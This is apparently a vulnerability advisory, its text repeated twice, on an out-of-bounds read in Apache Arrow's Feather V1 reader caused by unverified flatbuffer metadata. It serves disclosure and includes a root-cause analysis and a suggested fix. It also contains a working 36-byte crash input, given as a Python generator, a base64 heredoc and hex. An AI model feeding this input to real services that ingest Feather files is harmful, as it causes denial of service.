Summary
Opening a crafted Feather V1 file through the public
arrow::ipc::feather::Reader::Open API triggers an AddressSanitizer
heap-buffer-overflow (out-of-bounds read) inside Arrow's legacy Feather V1
metadata parsing. The reader calls fbs::GetCTable on the trailing metadata
flatbuffer without first running a flatbuffers::Verifier, then
dereferences attacker-controlled offsets in ReaderV1::ReadSchema
(cpp/src/arrow/ipc/feather.cc:178) before any Status error can be returned.
A 36-byte file with the FEA1 magic and a corrupt footer triggers the crash
deterministically, so any service that ingests untrusted Feather V1 files can be
crashed (denial of service).
Tested at pinned commit 16fe34250a2ef261790b9cc414fdf0831669cf9f
(25.0.0-SNAPSHOT).
Root Cause
ReaderV1::Open reads the trailing metadata flatbuffer and obtains a typed view
of it via fbs::GetCTable(...). A flatbuffer obtained this way is untrusted:
its vtable, field offsets, and vector lengths are attacker-controlled bytes. The
flatbuffers contract requires a caller to run a flatbuffers::Verifier over the
buffer before touching any generated accessor; only verification guarantees that
every offset stays inside the buffer.
ReaderV1::Open skips that step. It goes straight from GetCTable to
ReadSchema(), which dereferences metadata_->columns() on the unverified
table. columns() is a flatbuffers GetPointer that reads the vtable and an
offset field; with a corrupt offset, flatbuffers::ReadScalar reads past the end
of the metadata buffer.
Vulnerable code (cpp/src/arrow/ipc/feather.cc:172):
metadata_ = fbs::GetCTable(metadata_buffer_->data()); // no flatbuffers::Verifier
return ReadSchema();
}
Status ReadSchema() {
std::vector<std::shared_ptr<Field>> fields;
for (int i = 0; i < static_cast<int>(metadata_->columns()->size()); ++i) { // line 178: deref unverified flatbuffer
const fbs::Column* col = metadata_->columns()->Get(i);
std::shared_ptr<DataType> type;
RETURN_NOT_OK(
GetDataType(col->values(), col->metadata_type(), col->metadata(), &type));
fields.push_back(::arrow::field(col->name()->str(), type));
}
Call chain (attacker bytes -> fault):
arrow::ipc::feather::Reader::Open feather.cc:773 / :794 (public API)
-> ReaderV1::Open feather.cc:173
metadata_ = fbs::GetCTable(...) feather.cc:172 <- NO flatbuffers::Verifier
-> ReaderV1::ReadSchema feather.cc:178
metadata_->columns()->size() -> fbs::CTable::columns() feather_generated.h:698
-> flatbuffers::Table::GetVTable
-> flatbuffers::ReadScalar base.h:440 <- OOB read
The metadata buffer is sized to the file's declared metadata_length; the
corrupt offset points past that region, so the accessor reads out of bounds.
Arrow's own threat model (docs/source/cpp/security.rst, "Ingesting untrusted
data") states the IPC reader APIs must return an arrow::Status error on
malformed input. The V1 reader violates that contract: it crashes before it can
return a Status.
PoC
A 36-byte malformed Feather V1 file: the FEA1 magic header, padding, a
metadata_length of 0, and the trailing FEA1 magic. Reader::Open selects
the legacy V1 path on the FEA1 magic, then GetCTable builds a table over an
empty/short metadata region and columns() reads out of bounds.
# generate_poc.py — re-create the shipped 36-byte crash input
poc = (b"FEA1" # leading magic
+ b"\xff" * 24 # corrupt footer body
+ b"\x00\x00\x00\x00" # metadata_length = 0
+ b"FEA1") # trailing magic
open("poc.bin", "wb").write(poc)
assert len(poc) == 36
Crash input size: 36 bytes (poc/poc.bin, md5 9d96bcc065b6672396fed18492792d03).
Reproduction
Build Arrow C++ from source with -DARROW_IPC=ON and AddressSanitizer, then open the attached Feather
V1 file through the public reader API:
#include <arrow/ipc/feather.h>
#include <arrow/io/memory.h>
// auto buf = ...read poc.bin...;
auto source = std::make_shared<arrow::io::BufferReader>(buf);
std::shared_ptr<arrow::ipc::feather::Reader> reader;
auto st = arrow::ipc::feather::Reader::Open(source).Value(&reader); // OOB read here
ReaderV1::Open does metadata_ = fbs::GetCTable(metadata_buffer_->data()) with no
flatbuffers::Verifier over the metadata, then ReadSchema() dereferences metadata_->columns() on
the unverified flatbuffer:
AddressSanitizer: heap-buffer-overflow READ
#0 flatbuffers::ReadScalar<...> base.h
#1 arrow::ipc::feather::fbs::CTable::columns() feather_generated.h
#2 ReaderV1::ReadSchema / ReaderV1::Open ipc/feather.cc
The unverified GetCTable + columns() deref is still present in current master (cpp/src/arrow/ipc/feather.cc:172).
PoC: 36-byte .feather file (recreate from the base64 below).
Suggested Fix
Run a flatbuffers::Verifier over the metadata buffer before calling
fbs::GetCTable / dereferencing any accessor, returning Status::Invalid on
failure — matching how the V2/IPC reader rejects malformed metadata:
ARROW_ASSIGN_OR_RAISE(metadata_buffer_,
source->ReadAt(size - footer_size - metadata_length,
metadata_length, /*allow_short_read=*/false));
- metadata_ = fbs::GetCTable(metadata_buffer_->data());
+ flatbuffers::Verifier verifier(metadata_buffer_->data(),
+ metadata_buffer_->size());
+ if (!fbs::VerifyCTableBuffer(verifier)) {
+ return Status::Invalid("Feather V1 metadata failed flatbuffer verification");
+ }
+ metadata_ = fbs::GetCTable(metadata_buffer_->data());
return ReadSchema();
(The exact verifier symbol depends on the generated feather_generated.h; the
principle is "verify before accessing", and the precise call is the upstream
maintainer's judgement.)
PoC bytes (self-contained)
The trigger input is 36 bytes (poc/poc.bin).
Recreate it exactly with:
base64 -d > poc.bin <<'B64'
RkVBMf///////////////////////////////wAAAABGRUEx
B64
Hex: 46454131ffffffffffffffffffffffffffffffffffffffffffffffff0000000046454131
Credit
Aisle Research (Ze Sheng (O2Lab & TAMU), Dmitrijs Trizna, Luigino Camastra, Guido Vranken).
Summary
Opening a crafted Feather V1 file through the public
arrow::ipc::feather::Reader::OpenAPI triggers an AddressSanitizerheap-buffer-overflow (out-of-bounds read) inside Arrow's legacy Feather V1
metadata parsing. The reader calls
fbs::GetCTableon the trailing metadataflatbuffer without first running a
flatbuffers::Verifier, thendereferences attacker-controlled offsets in
ReaderV1::ReadSchema(
cpp/src/arrow/ipc/feather.cc:178) before anyStatuserror can be returned.A 36-byte file with the
FEA1magic and a corrupt footer triggers the crashdeterministically, so any service that ingests untrusted Feather V1 files can be
crashed (denial of service).
Tested at pinned commit
16fe34250a2ef261790b9cc414fdf0831669cf9f(25.0.0-SNAPSHOT).
Root Cause
ReaderV1::Openreads the trailing metadata flatbuffer and obtains a typed viewof it via
fbs::GetCTable(...). A flatbuffer obtained this way is untrusted:its vtable, field offsets, and vector lengths are attacker-controlled bytes. The
flatbuffers contract requires a caller to run a
flatbuffers::Verifierover thebuffer before touching any generated accessor; only verification guarantees that
every offset stays inside the buffer.
ReaderV1::Openskips that step. It goes straight fromGetCTabletoReadSchema(), which dereferencesmetadata_->columns()on the unverifiedtable.
columns()is a flatbuffersGetPointerthat reads the vtable and anoffset field; with a corrupt offset,
flatbuffers::ReadScalarreads past the endof the metadata buffer.
Vulnerable code (
cpp/src/arrow/ipc/feather.cc:172):Call chain (attacker bytes -> fault):
The metadata buffer is sized to the file's declared
metadata_length; thecorrupt offset points past that region, so the accessor reads out of bounds.
Arrow's own threat model (
docs/source/cpp/security.rst, "Ingesting untrusteddata") states the IPC reader APIs must return an
arrow::Statuserror onmalformed input. The V1 reader violates that contract: it crashes before it can
return a
Status.PoC
A 36-byte malformed Feather V1 file: the
FEA1magic header, padding, ametadata_lengthof 0, and the trailingFEA1magic.Reader::Openselectsthe legacy V1 path on the
FEA1magic, thenGetCTablebuilds a table over anempty/short metadata region and
columns()reads out of bounds.Crash input size: 36 bytes (
poc/poc.bin, md59d96bcc065b6672396fed18492792d03).Reproduction
Build Arrow C++ from source with
-DARROW_IPC=ONand AddressSanitizer, then open the attached FeatherV1 file through the public reader API:
ReaderV1::Opendoesmetadata_ = fbs::GetCTable(metadata_buffer_->data())with noflatbuffers::Verifierover the metadata, thenReadSchema()dereferencesmetadata_->columns()onthe unverified flatbuffer:
The unverified
GetCTable+columns()deref is still present in currentmaster(cpp/src/arrow/ipc/feather.cc:172).PoC: 36-byte
.featherfile (recreate from the base64 below).Suggested Fix
Run a
flatbuffers::Verifierover the metadata buffer before callingfbs::GetCTable/ dereferencing any accessor, returningStatus::Invalidonfailure — matching how the V2/IPC reader rejects malformed metadata:
ARROW_ASSIGN_OR_RAISE(metadata_buffer_, source->ReadAt(size - footer_size - metadata_length, metadata_length, /*allow_short_read=*/false)); - metadata_ = fbs::GetCTable(metadata_buffer_->data()); + flatbuffers::Verifier verifier(metadata_buffer_->data(), + metadata_buffer_->size()); + if (!fbs::VerifyCTableBuffer(verifier)) { + return Status::Invalid("Feather V1 metadata failed flatbuffer verification"); + } + metadata_ = fbs::GetCTable(metadata_buffer_->data()); return ReadSchema();(The exact verifier symbol depends on the generated
feather_generated.h; theprinciple is "verify before accessing", and the precise call is the upstream
maintainer's judgement.)
PoC bytes (self-contained)
The trigger input is 36 bytes (
poc/poc.bin).Recreate it exactly with:
Hex:
46454131ffffffffffffffffffffffffffffffffffffffffffffffff0000000046454131Credit
Aisle Research (Ze Sheng (O2Lab & TAMU), Dmitrijs Trizna, Luigino Camastra, Guido Vranken).